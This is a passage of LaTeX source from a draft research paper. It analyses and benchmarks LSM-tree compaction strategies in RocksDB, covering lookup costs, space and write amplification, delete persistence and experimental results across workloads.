Compacting all files from a level regardless of the ``hotness'' of the file causes recently and frequently accessed files to move to lower levels of the tree, which is particularly undesirable when the goal is to maximize the read throughput.
In contrast, partial compaction allows for choosing files for compaction while optimizing for read performance.
\textit{Data movement policy.} For partial compaction strategies, the choice of files to compact influences the performance for point lookups on existing keys significantly.
Choosing the ``coldest'' file, i.e., the least recently accessed file compaction ensures that the frequently read files are retained in the shallower level, which reduces the average cost for point lookups.
This improvement is becomes pronounced further for lookup-intensive workloads that has a high degree of temporality~\cite{Cao2020}, reducing the cost for point lookups on existing keys to $\mathcal{O}(1)$ in leveling and $\mathcal{O}(T)$ for tiering without any assistance from caching.
Compaction strategies that optimizes different performance metrics, such as write amplification, space amplification, or delete performance, however, may choose a ``hot'' file for compaction, which adversely affects the lookup performance.
\subsubsection{\textbf{Range Lookups}} \label{sec:4.2.2}
LSM-trees support range lookups by sort-merging all the qualifying runs (partly or entirely) in memory and then returning the recent-most version of the qualifying entries.
Range lookups benefit from fence pointers in efficiently identifying the first page of qualifying entries in each level, but are not assisted by Bloom filters.
The cost for range lookups depend on the selectivity of the range query and the number of sorted runs in a tree.
Compactions affect the range lookup performance very differently from point lookups.
For our analysis, we distinguish a short range lookup from long range lookup in terms of the number of disk pages per sorted run affected by the range query.
A short range query should not have more than two qualifying pages for each sorted run present in a tree~\cite{Dayan2018}.
\textit{\blue{Data layout}.} \blue{The data layout} controls the number of sorted runs in an LSM-tree, and therefore, influences the cost for range lookups.
The average cost for a long range lookup is given as $\mathcal{O}(\tfrac{s \cdot N}{B})$ for leveling, and that for tiering is $\mathcal{O}(\tfrac{T \cdot s \cdot N}{B})$, where $s$ denotes the selectivity of the range query.
For short range queries, the average cost is simply proportional to the number of sorted runs, and is given as $\mathcal{O}(L)$ for leveling and $\mathcal{O}(T \cdot L)$ for tiering.
For hybrid designs, the cost for range lookups fall in between that for leveling and tiering, and depends on the exact design of the tree.
\textit{Compaction trigger.} The effect of secondary compaction triggers is pronounced on the range query performance than that on point queries.
While the amount of data movement peer operation for a point lookup and a short range lookup are comparable, long range lookups with moderate to large selectivity read a significantly larger amount of data from the disk.
In presence of secondary compaction triggers, compactions and long range queries contend for the same device bandwidth, which causes a drop in the read throughput.
\textit{Compaction granularity.} A larger granularity of data movement during compaction leads to large amounts of data movement periodically, and thus, causes a drop in the lookup performance as a result of bandwidth sharing.
However, such compactions always reduce the number of non-empty levels in a tree at least by one, and by a plurality, less frequently.
Reduction in the number of levels in a tree, improves the range lookup performance dramatically as it mitigates reading superfluous data from disk and also requires fewer CPU-cycles for the sort-merge operation.
In the best case, the cost for long range lookups drops down to $\mathcal{O}(s)$ for leveling and $\mathcal{O}(T \cdot s)$ for tiering, and that for short range lookups becomes $\mathcal{O}(1)$ for leveling and $\mathcal{O}(T)$ in case of tiering.
Partial compactions, in contrast, always have a logarithmically increasing number of non-empty levels in the tree, and thus, the cost for range lookups remains unchanged.
\textit{Data movement policy.} As range lookups require sort-merging the records spread across all sorted runs in a tree, the position of a qualifying entry in the tree do not influence the performance of range lookups.
Also, the data movement policies only pertain to partial compactions, where the number of non-empty levels in a tree follows a strictly increasing trend, each range lookup must always take into account qualifying entries from all tree-levels.
Thus, the range lookup performance remains agnostic of the data movement policy.
\subsection{Space Utilization} Following prior work~\cite{Sarkar2020}, we define space amplification as the ratio between the size of superfluous entries and the size of the unique entries in the tree.
Mathematically, space amplification ranges between $[0, \infty)$, and that if all inserted keys are unique there is no space amplification.
However, in as fraction of updates increase in a workload, the space amplification also increases, and it is further amplified in presence of point and range deletes in a workload.
Compactions influence the space amplification of a tree along several dimensions.
\textit{\blue{Data layout}.} In presence of only updates, the worst-case space amplification in a leveled LSM-tree is $\mathcal{O}(1/T)$ and $\mathcal{O}(T)$ for tiering~\cite{Dayan2018}.
However, with the addition of deletes, the space amplification increases significantly, and is given as $\mathcal{O}(\tfrac{N}{1 - \lambda})$ for leveling and $\mathcal{O}(\tfrac{(1 - \lambda) \cdot N + 1}{\lambda \cdot T})$ for tiering, where $\lambda$ denotes is ratio of the size of a tombstone and the average size of a key-value pair~\cite{Sarkar2020}.
The space amplification for hybrid designs lay between the two extremely, and depends heavily on the exact tree design.
\textit{Compaction trigger.} Compactions can be triggered as a function of the overall space amplification of an LSM-tree, and is particularly useful for tiered implementations which has a higher headroom for space amplification~\cite{RocksDB2020}.
Further, triggering compactions based on number of tombstone in a file~\cite{Dong2016} or age of the oldest tombstone contained in a file~\cite{Sarkar2020} propels the tombstones eagerly to the deeper levels of the tree, which reduces the space amplification by compacting the invalidated entries early.
\textit{Compaction granularity.} Compacting data at a large granularity often reduces the number of non-empty levels in a tree, and in the process, arranges the data across fewer but larger and more compact sorted runs.
For example, in tiering, once a level reaches a nominal capacity all $T-1$ sorted runs are compacted together and written as a single compact and larger run in the following level, rendering the child level empty.
Similarly, in leveling with full compaction, every time level reaches saturation, sorted runs from one or more levels are merged with the level of larger capacity, reducing the number of sorted runs.
Any superfluous entry from the input runs is removed during this process, which leads to reduced space amplification.
For leveling with full compactions, periodically all levels are merged together to a single long level (when the saturation trigger for all levels are triggered simultaneously), which yields a compact tree with no space amplification.
However, for partial compaction, as the number of sorted runs always follow a increasing trend, the worst-case space amplification remains the same.
\textit{Data movement policy.} While compacting data at the granularity of a file, choosing files for compaction based on number of tombstones in a file or tombstones with an expired time-to-live the reduces the space amplification.
However, optimizing for performance goals, such as write amplification or read throughput, do not necessarily bring down the write amplification.
\subsection{Delete Performance} While deletes affect the performance of an LSM-based engine across several facets, here we focus on persistently deleting entries within a time-limit in order to analyze the implications of compactions from a privacy standpoint.
To ensure timely and persistent deletion, a tombstone must participate in a compaction involving the last tree-level within the threshold time.
\textit{\blue{Data layout}.} The average time taken to persistently delete an entry from a tree is given by $\mathcal{O}(\tfrac{T^{L-1} \cdot P \cdot B}{I})$ for leveling and $\mathcal{O}(\tfrac{T^L \cdot P \cdot B}{I})$ for tiering~\cite{Sarkar2020}, where $I$ denotes the rate of ingestion of unique entries to the database.
Note that, while for leveling propelling the tombstone to the last level ensures persistent deletion of the target entry, in case of tiering, the tombstone must participate in a compaction involving all the sorted runs from the last level to guarantee delete persistence.
\textit{Compaction trigger, granularity, and data movement policy.} Saturation-based compaction triggers ensure persistence of all superfluous entries in a tree every time a new level is added to a tree, but only when the compactions are performed at a granularity of levels or sorted runs.
For partial compaction strategies, a secondary compaction trigger, that compacts files with tombstones eagerly, must be invoked to ensure delete persistence~\cite{RocksDBTS,Sarkar2020}.
Otherwise, in the worst-case, deletes may not be persisted at all in an LSM-tree based on partial compactions.
\subsection{Summarizing the Implications}
\red{A super-short summary of the section.}
\subsection{Compaction Benchmark}
\subsection{Standardization of Compaction Strategies}
We choose RocksDB \cite{FacebookRocksDB} as our experimental platform, as it (i) is open-source, (ii) is widely used across industry and academia, (iii) has a large active community.
To ensure fair comparison we implement all compaction
strategies under the same LSM-engine.
\Paragraph{Implementation}
We integrate our codebase into RocksDB v6.11.4.
We assign to \textit{compactions a higher priority than writes}
to accurately benchmark them, while always maintaining the
LSM structure~\cite{Sarkar2021}.
\Paragraphit{Compaction Trigger}
The default compaction trigger for (hybrid) leveling in RocksDB is level saturation~\cite{RocksDB2020a}, and for the universal compaction is space amplification~\cite{RocksDB2020}.
RocksDB also supports delete-driven compaction triggers, specifically whether the \#tombstones in a file goes beyond a threshold.
We further implement a trigger based on the tombstones age to facilitate timely deletes~\cite{Sarkar2020}.
\Paragraphit{Data layout}
By default, RocksDB supports only two different data layouts: \textit{hybrid leveling} (tiered first level, leveled otherwise)~\cite{RocksDB2020a} and a variation of \textit{tiering} (with a different trigger), termed \emph{universal compaction}~\cite{RocksDB2020}.
We also implement pure \textit{leveling} by limiting the number of first-level runs to one, and triggering a compaction when the number of first-level files is more than one.
\Paragraphit{Compaction Granularity}
The granularity for leveling is \textit{file} and \textit{sorted runs} for tiering.
To implement classical leveling, we mark all files of a level for compaction.
We ensure that ingestion may resume only after all the compaction-marked files are compacted thereby replicating the behavior of the full compaction routine.
\Paragraphit{Data Movement Policy}
RocksDB (v6.11.4) provides four different data movement policies: a file (i) with least overlap with its parent level, (ii) least recently accessed, (iii) with the oldest data in a level, and (iv) that has more tombstones than a threshold.
We also implement partial compaction strategies that choose a file (v) in a round-robin manner, (vi) with the least overlap with its grandparent level, and (vii) based on the age of the tombstones in a file.
\Paragraph{Designing the Compaction API}
We expose the compaction primitives through a new API
as configurable knobs.
An application can configure the desired compaction strategy and initiate workload execution.
The API also allows the application to change the compaction strategy for an existing database.
Overall, our experimental infrastructure allows us (i) to ensure an identical underlying structure while setting the compaction benchmark, and (ii) to tune and configure the design of the LSM-engine as necessary.
\subsection{Performance Metrics}
We now present the performance metrics used in our analysis.
\Paragraph{Compaction Latency}
The compaction latency includes the time taken to (i) identify the files to compact, (ii) read the participating files to memory, (iii) sort-merge (and remove duplicates from) the files, (iv) write back the result to disk as new files, (v) invalidate the older files, and (vi) update the metadata in the manifest file~\cite{FacebookRocksDB}.
\textit{The RocksDB metric \texttt{rocksdb.compaction.times.micros} is used to measure the compaction latency.}
\Paragraph{Write Amplification (WA)}
The repeated reads and writes due to compaction cause high WA~\cite{Raju2017}.
We formally define WA as \textit{the number of times an entry is (re-)written without any modifications to disk during its lifetime}.
\textit{We use \texttt{rocksdb.compact.write.bytes} and the actual data size to compute WA.}
\Paragraph{Write Latency}
Write latency is driven by the device bandwidth utilization, which depends on (i) write stalls due to compactions and (ii) the sustained device bandwidth.
\textit{We use the \texttt{rocksdb.db.write.micros} histogram to measure the average and tail of the write latency.}
\Paragraph{Read Amplification (RA)}
RA is the ratio between the total number of disk pages read for point lookups and the pages that should be read \emph{ideally}.
\textit{We use \texttt{rocksdb.bytes.read} to compute RA.}
\Paragraph{Point Lookup Latency}
Compactions determine the position of the files in an LSM-tree which affects point lookups on entries contained in those files.
\textit{Here, we use the \texttt{rocksdb.db.get.micros}.}
\Paragraph{Range Lookup Latency}
The range lookup latency depends on the selectivity of the range query, but is affected by the data layout.
\textit{We also use the \texttt{db.get.micros} histogram for range lookups.}
\Paragraph{Space Amplification (SA)}
SA depends on the data layout, compaction granularity, and the data movement policy.
SA is defined as \textit{the ratio between the size of logically invalidated entries and the size of the unique entries in the tree}~\cite{Dayan2018}.
\textit{We compute SA using the size of the database and the size of the logically valid entries.}
\Paragraph{Delete Performance}
We measure the degree to which the tested compaction strategies
persistently delete entries within a time-limit~\cite{Sarkar2020} in order to analyze the implications of compactions from a privacy standpoint~\cite{CCPA2018,Deshpande2018,Kraska2019a,Sarkar2018,Schwarzkopf2019,Wang2019}.
\textit{We use the RocksDB file metadata \texttt{age} and a delete persistence threshold.}
\subsection{Benchmarking Methodology}
We now discuss the methodology for varying the
key input parameters for our analysis: \textit{workload} and the \textit{LSM tuning}.
\subsubsection{\textbf{Workload}}
A typical key-value workload comprises of five primary operations: inserts, updates, point lookups, range lookups, and deletes.
Point lookups target keys that may or may not exist in the database -- we refer to these as \textit{non-empty} and \textit{empty point lookups}, respectively.
Range lookups are characterized by their \textit{selectivity}.
To analyze the impact of each operation, we vary the \textit{fraction} of each operation as well as their qualitative characteristics (i.e., selectivity and entry size).
We further vary the \textit{data distribution} of ingestion and queries focusing on (i) uniform, (ii) normal, and (iii) Zipfian distributions.
Overall, our custom-built benchmarking suite is a superset of the influential YCSB benchmark~\cite{Cooper2010} as well as the insert benchmark~\cite{Callaghan2017a}, and supports a number of parameters that are missing from existing workload generators, including deletes.
Our workload generator exposes over $64$ degrees of freedom, and is available via GitHub~\cite{Sarkar2021a} for dissemination, testing, and adoption.
\subsubsection{\textbf{LSM Tuning}}
We further study the interplay of LSM tuning and compaction strategies.
We consider questions like
\textit{which compaction strategy is appropriate for a specific LSM design and a given workload?}
To answer such questions we vary in our
experimentation key LSM tuning parameters, like (i) the memory buffer size, (ii) the block cache size, and (iii) the size ratio of the tree.
\subsection{Performance Implications}
\label{subsec:performance}
We first analyze the implications of compactions on the ingestion, lookup, and overall performance of an LSM-engine.
\subsubsection{\textbf{Data loading}}
In this experiment, we insert $10$M key-value entries uniformly generated into an empty database to quantify the raw ingestion and compaction performance.
\Paragraph{\Ob Compactions Cause High Data Movement}
Fig.~\ref{fig:W1}(a) shows that the overall (read and write) data
movement due to compactions is significantly larger than the actual
size of the data ingested.
Among the leveled LSM-designs, \texttt{Full} moves $63\times$ ($32\times$ for reads and $31\times$ for writes) the data originally ingested.
The data movement is significantly smaller for \texttt{Tier}, however, it remains $23\times$ of the data size.
The data movement for \texttt{1-Lvl} is similar to that of the leveled strategies in partial compaction.
These observations conforms with prior work~\cite{Raju2017}, but also highlight the problem of \textit{read amplification due to compactions} leading to poor device bandwidth utilization.
\Paragraph{\Ob Partial Compaction Reduces Data Movement at the Expense of Increased Compaction Count}
We now shift our attention to the different variations
of leveling.
Fig. \ref{fig:W1}(a) shows that leveled partial compaction leads to $34\%$--$56\%$ less data movement than \texttt{Full}.
The reason is twofold:
(1) A file with no overlap with its parent level, is only logically merged. Such \textit{pseudo-compactions} require simple metadata (file pointer) manipulation in memory, and no I/Os.
(2) A smaller compaction granularity reducing overall data movement by choosing a file with (i) the least overlap, (ii) the most updates, or (iii) the most tombstones for compaction.
Specifically, \texttt{LO+1} (and \texttt{LO+2}) is designed to pick files with the least overlap with the parent $i+1$ (and grandparent $i+2$) level.
They move $10\%$--$23\%$ less data than other partial compaction strategies.
Fig. \ref{fig:W1}(b) shows that the partial compaction strategies as well as \texttt{1-Lvl} perform $4\times$ more
compaction jobs than \texttt{Full}, which is equal to the number of tree-levels.
Note that for an LSM-tree with partial compaction, every
buffer flush triggers cascading compactions to all $L$ levels, while in a
full-level compaction system this happens when a level is full (every $T$
compactions).
Finally, since both \texttt{Tier} and \texttt{Full} are full-level
compactions the compaction count is similar.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Larger compaction granularity leads to fewer but larger compactions}} \textit{Full-level compactions perform about $1/L$ times fewer compactions than partial compaction routines, however, full-level compaction moves nearly $2L$ times more data per compaction.}
}%
\normalsize
}
\vspace{0.1mm}
\begin{figure*}[!ht]
\vspace{-0.3in}
\centering
\includegraphics[width=0.98\textwidth]{omnigraffle/Plot-1.pdf}
\label{fig:W1-bytes-comp}
\vspace*{-0.25in}
\caption{Compactions influence the ingestion performance of LSM-engines heavily in terms of (a) the overall data movement, (b) the compaction count, (c) the compaction latency, and (d) the tail latency for writes, as well as (e, f) the point lookup performance. The range scan performance (g) remains independent of compactions as the amount of data read remains the same. Finally, the lookup latency (h) depends on the proportion of empty queries ($\alpha$) in the workload.}
\label{fig:W1}
\vspace{-0.1in}
\end{figure*}
\Paragraph{\Ob Full Leveling has the Highest Mean Compaction Latency}
As expected, \texttt{Full} compactions have the highest average latency
($1.2$--$1.9\times$ higher than partial leveling, and $2.1\times$ than tiering).
The mean compaction latency is observed to be directly proportional to the average amount of data moved per compaction.
\texttt{Full} can neither take advantage of pseudo-compactions nor optimize the data movement during compactions, hence, on average the data movement per compaction remains large.
\texttt{1-Lvl} provides the most predictable performance in terms of compaction latency.
Fig. \ref{fig:W1}(c) shows the mean compaction latency for all
strategies as well as the median (P50), the $90^{th}$ percentile (P90),
the $99^{th}$ percentile (P99), and the maximum (P100).
The tail compaction latency largely depends on the amount of data moved by the largest compaction jobs triggered during the workload execution.
We observe that the tail latency (P90, P99, P100) is more predictable for \texttt{Full}, while partial compactions, and especially, tiering have high variability due to differences in the data movement policies.
The compaction latency presented in Fig. \ref{fig:W1}(c) can be broken to
IO time and CPU time. We observe that the CPU effort is about $50\%$
regardless of the compaction strategy.
During a compaction, CPU cycles are spent in (1) obtaining locks and taking
snapshots, (2) merging the entries, (3) updating file
pointers and metadata, and (4) synchronizing output files post compaction.
Among these, the time spent to sort-merge the data in memory dominates.
\Paragraph{The Tail Write Latency is Highest for Tiering}
Fig. \ref{fig:W1}(d) shows that the tail write latency is highest for tiering.
The tail write latency for \texttt{Tier} is $\sim$$2.5\times$ greater than \texttt{Full} and $5$--$12\times$ greater than partial compactions.
Tiering in RocksDB~\cite{RocksDB2020} optimizes for writes and opportunistically seeks to compact all data to a large single level.
This design achieves lower average write latency (Fig. \ref{fig:W1-mixed}(b)) at the expense of prolonged write stalls in the worst case, which is when the overlap between two consecutive levels is very high.
\texttt{Full} also has $2$--$5\times$ higher tail write stalls than partial compactions because when multiple consecutive levels are close to saturation, a buffer flush can result in a cascade of compactions.
\texttt{1-Lvl} too has a higher tail write latency as the first level is realized as tiering.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{\texttt{Tier} may cause prolonged write stalls}}
\textit{Tail write stall for \texttt{Tier} is $\sim$$25$ms, while for partial leveling (\texttt{Old}) it is as low as $1.3$ms.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Querying the Data}}
In this experiment, we perform $1$M point lookups on the previously generated
preloaded database (with $10$M entries). The lookups are uniformly distributed
in the domain and we vary the fraction of empty lookups $\alpha$ between 0 and 1.
Specifically, $\alpha = 0$ indicates that we consider only non-empty lookups,
while for $\alpha = 1$ we have lookups on non-existing keys. We also execute
$1000$ range queries, while varying their selectivity.
\Paragraph{\Ob The Point Lookup Latency is Highest for Tiering and Lowest for Full-Level Compaction}
Fig. \ref{fig:W1}(e) shows that point lookups perform the best for \texttt{Full}, and the worst for tiering.
The mean latency for point lookups with tiering is between
$1.1$--$1.9\times$ higher than that with leveled compactions for lookups on existing keys, and $\sim$$2.2\times$ higher for lookups on non-existing keys.
Note that lookups on existing keys must always perform at least one I/O per
lookup (unless they are cached).
For non-empty lookups in a tree with size ratio $T$, theoretically,
the lookup cost for tiering should be $T\times$ higher than its leveling
equivalent~\cite{Dayan2017}.
However, this \textit{worst-case} cost is not always accurate; in practice it depends on (i) the block cache size and the caching policy, (ii) the temporality of the lookup keys, and (iii) the implementation of the compaction strategies.
RocksDB-tiering has overall fewer sorted runs than textbook tiering.
Taking into account the block cache and temporality in the lookup workload,
the observed tiering cost is less than $T\times$ the cost observed for
\texttt{Full}. In addition, \texttt{Full} is $3\%$--$15\%$ lower than the partial
compaction routines, because during normal operation of \texttt{Full} some levels
might be entirely empty, while for partial compaction all levels are always
close to being full.
Finally, we note that the choice of data movement policy does not affect the
point lookup latency significantly, which always benefits from Bloom filters
($10$ bits-per-key) and the block cache ($0.05\%$ of the data size).
\begin{figure*}[!ht]
\vspace{-0.3in}
\centering
\includegraphics[width=1.02\textwidth]{omnigraffle/Plot-3.pdf}
\vspace*{-0.35in}
\caption{(a-c) The average ingestion performance for workloads with interleaved inserts and queries is similar to that of an insert-only workload, but (d) with worse tail performance. However, (e) interleaved lookups are significantly faster.}
\vspace*{-0.1in}
\label{fig:W1-mixed}
\end{figure*}
\Paragraph{Point Lookup Latency Increases for Comparable Number of Empty and Non-Empty Queries} A surprising result for point lookups
that is also revealed in Fig. \ref{fig:W1}(e) is that they perform worse when the
fraction of empty and non-empty lookups is balanced.
Intuitively, one would expect that as we have more empty queries (that is, as $
\alpha$ increases) the latency would decrease since the only data accesses needed
by empty queries are the ones due to Bloom filter false
positives~\cite{Dayan2017}.
To further investigate this result, we plot in
Fig.~\ref{fig:W1}(h) the $90^{th}$
percentile ($P90$) latency which shows a similar
curve for point lookup latency as we vary $\alpha$.
In our configuration each file uses $20$ pages
for its Bloom filters, $4$ pages for its index blocks, and
that the false positive is $FPR=0.8\%$.
A non-empty query needs to load the Bloom filters of the levels it visits until it terminates.
For all intermediate levels, it accesses the index and data blocks with probability $FPR$, and then fetches the index and data blocks for the target level.
On the other hand, an empty query probes the Bloom filters of all levels before returning
an empty result. Note that for each level
it also accesses the index and data blocks with $FPR$.
The counter-intuitive shape is a result of the
non-empty lookups not needing to load the Bloom filters
for all levels when $\alpha=0$ and the
empty lookups
accessing index and data only when there is a false
positive when $\alpha=1$.
Fig. \ref{fig:W1}(h) also shows the highly predictable point lookup performance of \texttt{1-Lvl}.
\vspace{2mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{The point lookup latency is largely unaffected by the data movement policy}} \textit{In presence of Bloom filters (with high enough memory) and small enough block cache, the point query latency remains largely unaffected by the data movement policy as long as the number of sorted runs in the tree remains the same. This is because block-wise caching of the filter and index blocks reduces the time spent performing disk I/Os significantly.}
}%
\normalsize
}
\vspace{0.7mm}
\Paragraph{\Ob Read Amplification is Influenced by the Block Cache Size and File Structure, and is Highest for Tiering}
Fig. \ref{fig:W1}(f) shows that the read amplification across different
compaction strategies for non-empty queries ($\alpha=0$) is between $3.5$ and
$4.4$. This is attributed to the size of filter and index blocks which
are $5\times$ and $1\times$ the size of a data block, respectively.
Each non-empty point lookup fetches between $1$ and $L$ filter blocks depending
on the position of the target key in the tree, and up to $L \cdot FPR$
index and data blocks.
Further, the read amplification increases exponentially with $\alpha$, reaching up to $14.4$ for leveling and $21.3$ for tiering (for $\alpha=0.8$).
Fig. \ref{fig:W1}(f) also shows that the estimated read amplification for point lookups is between $1.2\times$ and $1.8\times$ higher for \texttt{Tier} than for leveling strategies.
This higher read amplification for \texttt{Tier} is owing to the larger number of sorted runs in the tree, and is in line with \textbf{O4}.
\Paragraph{The Effect of Compactions on Range Scans is Marginal}
To answer a range query, LSM-trees instantiate multiple \textit{run-iterators} scanning all sorted runs containing qualifying data.
Thus, its performance depends on (i) the iterator scan time (which relates to selectivity) and (ii) the time to merge the data.
The number of sorted runs in a
leveled LSM-tree remains the same, which results in similar range query latency for all leveled variations, especially for larger selectivity (Fig. \ref{fig:W1}(g)).
Note that without updates or deletes, the amount of data qualifying for a range query remains largely identical for different data layouts despite the number of runs being different.
The $\sim$$5\%$ higher average range query latency for \texttt{Tier}
is attributed to the additional I/Os needed to handle partially
qualifying disk pages from each run ($O(L\cdot T)$ in the worst case).
\subsubsection{\textbf{Executing mixed workloads}}
We now discuss the performance implications when ingestion and queries are mixed.
We interleave the ingestion of $10$M
unique key-value entries with $1$M point lookups.
The ratio of empty to non-empty lookups is varied across experiments.
All lookups are performed after $L-1$ levels are full.
Fig.~\ref{fig:W1-mixed} compares side by side the results for serial and interleaved execution of workloads with same specifications.
\begin{figure*}[t]
\vspace{-0.3in}
\centering
\includegraphics[width=0.95\textwidth]{omnigraffle/Plot-5.pdf}
\vspace*{-0.25in}
\caption{As the ingestion distribution changes to (a-d) PrefixZipf and (e-h) normal with standard deviation, the ingestion performance of the database remains nearly identical with improvement in the lookup performance.}
\vspace*{-0.1in}
\label{fig:W5}
\end{figure*}
\begin{figure*}[h]
\centering
\includegraphics[width=0.95\textwidth]{omnigraffle/Plot-6.pdf}
\vspace*{-0.25in}
\caption{Skewed lookup distributions like Zipfian (a, b) and normal (c, d) improve the lookup performance dramatically in the presence of a block cache and with the assistance of Bloom filters.}
\vspace*{-0.1in}
\label{fig:W6}
\end{figure*}
\Paragraph{\Ob Mixed Workloads have Higher Tail Write Latency}
Figures~\ref{fig:W1-mixed}(a) and (b) show that the
mean latency of compactions that are interleaved with
point queries is only marginally affected for all
compaction strategies. This is also corroborated by the
write amplification remaining unaffected by mixing
reads and writes as shown in Fig.~\ref{fig:W1-mixed}(c).
On the other hand, Fig.~\ref{fig:W1-mixed}(d) shows that
the tail write
latency is increased between $2$--$15\times$.
This increase is attributed to (1) the need of point
queries to access filter and index blocks that requires
disk I/Os that compete with writes and saturate the
device, and (2) the delay of
memory buffer flushing during lookups.
\Paragraph{Interleaving Compactions and Point Queries Helps Keeping the Cache Warm}
Since in this experiment we start the point queries when
$L-1$ levels of the tree are full, we expect that the
interleaved read query execution will be faster than
the serial one, by $1/L$ (25\% in our configuration) which
corresponds to the difference in the height of the trees.
However, Fig. \ref{fig:W1-mixed}(e) shows this
difference to be between $26\%$ and $63\%$ for non-empty
queries and between $69\%$ and $81\%$ for empty queries.
The reasons interleaved point query execution is faster
than expected are that (1) about $10\%$ of lookups
terminate within the memory buffer, without requiring any
disk I/Os, and (2) the block cache is pre-warmed with
filter, index, and data blocks cached during compactions.
Fig. \ref{fig:W1-mixed}(d) and \ref{fig:W1-mixed}(e) show how \texttt{1-Lvl} brings together \textit{the best of both worlds} and offer reasonably good ingestion and lookup performance simultaneously.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Compactions help lookups by warming up the caches}} \textit{As the file metadata is updated during compactions, the block cache is warmed up with the filter, index, and data blocks, which helps subsequent point lookups.}
}%
\normalsize
}
\subsection{Workload Influence}
\label{subsec:workload}
Next, we analyze the implications of the workloads on compactions.
\subsubsection{\textbf{Varying the Ingestion Distribution}}
In this experiment, we use an interleaved workload that varies the ingestion distribution (\textit{Zipfian} with $s=1.0$, \textit{normal} with $34\%$ standard deviation), and has uniform lookup distribution.
We use a variant of the Zipfian distribution, called \emph{PrefixZipf}, where the key prefixes follow a Zipfian distribution while the suffixes are generated uniformly.
This allows us to avoid having too many updates in the workload.
\Paragraph{Ingestion Performance is Agnostic to Insert Distribution}
Figures \ref{fig:W1}(a), \ref{fig:W5}(a), and \ref{fig:W5}(e) show that the total data movement during compactions remains virtually identical for (unique) insert-only workloads generated using uniform, PrefixZipf, and normal distributions, respectively.
Further, we observe that the mean and tail compaction latencies are agnostic of the ingestion distribution
(Fig. \ref{fig:W1}(c), \ref{fig:W5}(b), and \ref{fig:W5}(f) are almost identical as well).
As long as the data distribution does not change over
time, the entries in each level follow the
same distribution and the overlap between
different levels remains the same.
\textit{Therefore, for an ingestion-only workload
the data distribution does not influence the
choice of compaction strategy.}
\Paragraph{\Ob Insert Distribution Influences Point Queries}
Figure \ref{fig:W5}(c) shows that while tiering has a
slightly higher latency for point lookups, the relative
performance of the compaction strategies is close to each
other for any fraction of non-empty queries in the
workload (all values of $\alpha$).
This is because when empty queries are drawn uniformly from the key domain, the level-wise metadata and index blocks help to entirely avoid a vast majority of unnecessary disk accesses (including fetching index or filter blocks). \
In Fig.~\ref{fig:W5}(d), we observe that the read
amplification remains comparable to that in
Fig. \ref{fig:W1}(f) (\textit{uniform} ingestion) for $\alpha = 0$ and even $\alpha = 0.4$.
However, for $\alpha = 0.8$, the read amplification in
Fig. \ref{fig:W5}(d) becomes $65\%$-$75\%$ smaller than
in the case of uniform inserts. The I/Os performed to
fetch the filter blocks is close to zero.
\textit{This shows that all compaction strategies perform equally well while executing an empty query-heavy workload on a database pre-populated with PrefixZipf inserts.}
In contrast, when performing lookups on a database pre-loaded with normal ingestion, the point lookup performance (Fig. \ref{fig:W5}(g)) largely resembles its uniform equivalent (Fig. \ref{fig:W1}(h)), as the ingestion-skewness is comparable.
The filter and index block hits are $\sim10\%$ higher for the normal distribution compared to uniform for larger values of $\alpha$, which explains the comparatively lower read amplification shown in Fig. \ref{fig:W5}(h).
This plot also shows the first case of unpredictable behavior of \texttt{LO+2} for $\alpha=0$ and $\alpha=0.2$.
We observe more instances of such unpredictable behavior for \texttt{LO+2}, which probably explains why it is rarely used in new LSM stores.
Once again, for both the compaction and tail lookup performance, \texttt{1-Lvl} offers highly predictable performance.
\subsubsection{\textbf{Varying the Point Lookup Distribution}}
In this experiment, we change the point lookup
distribution to \textbf{Zipfian} and \textbf{normal},
while keeping the ingestion distribution as uniform.
\Paragraph{The Distribution of Point Lookups Significantly Affects Performance}
Zipfian point lookups on uniformly populated data
leads to low latency point queries for all compaction
strategies, as shown in Fig. \ref{fig:W6}(a) because the
block cache is enough for the popular blocks in all cases,
as also shown by the low read amplification in
Fig. \ref{fig:W6}(b).
On the other hand, when queries follow the normal
distribution, partial compaction strategies \texttt{LO+1}
and \texttt{LO+2} dominate all other approaches, while
\texttt{Tier} is found to perform significantly
slower than all other approaches, as shown in
Fig. \ref{fig:W6}(c) and \ref{fig:W6}(d).
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{For skewed ingestion/lookups, all compaction strategies behave similarly in terms of lookup performance}} \textit{While the ingestion distribution does not influence its performance, heavily skewed ingestion or lookups impacts query performance due to block cache and file metadata.}
}%
\normalsize
}
\vspace{1mm}
\begin{figure*}[h]
\vspace{-0.3in}
\centering
\includegraphics[width=\textwidth]{omnigraffle/Plot-7.pdf}
\vspace*{-0.2in}
\caption{Experiments with varying workload and data characteristics (a-l) and LSM tuning (m-r) show that there is no perfect compaction strategy -- choosing the appropriate compaction strategy is subject to the workload and the performance goal.}
\label{fig:W7}
\vspace*{-0.1in}
\end{figure*}
\subsubsection{\textbf{Varying the Proportion of Updates}}
We now vary the update-to-insert ratio, while interleaving
queries with ingestion. An update-to-insert ratio $0$ means
that all inserts are unique, while a ratio $8$ means that
each unique insert receives $8$ updates on average.
\Paragraph{\Ob For Higher Update Ratio Compaction Latency for Tiering Drops; \texttt{LO+2} Dominates the Leveling Strategies}
As the fraction of updates increases, the mean compaction latency decreases
significantly for tiering because we discard multiple
updated entries in every compaction (Fig. \ref{fig:W7}(a)).
We observe similar
but less pronounced trends for \texttt{Full} and
\texttt{LO+2}, while the remaining leveling strategies
remain largely unchanged.
\textit{Overall, larger
compaction granularity helps to exploit the presence of
updates by invalidating more entries at a time.}
Among the leveling strategies, \texttt{LO+2} performs best as
it moves $\sim$$20\%$ less
data during compactions, which also affects write
amplification as shown in Fig. \ref{fig:W7}(b).
As the fraction of updates increases, all compaction strategies including
\texttt{Tier} have lower tail compaction latency.
Fig. \ref{fig:W7}(c) shows that \texttt{Tier}'s tail compaction latency
drops from $6\times$ higher than \texttt{Full} to $1.2\times$ for an
update-to-insert ratio of $8$, which demonstrates that \texttt{Tier} is
most suitable for update-heavy workloads. We also observe that lookup
latency and read amplification also decrease for update-heavy workloads.
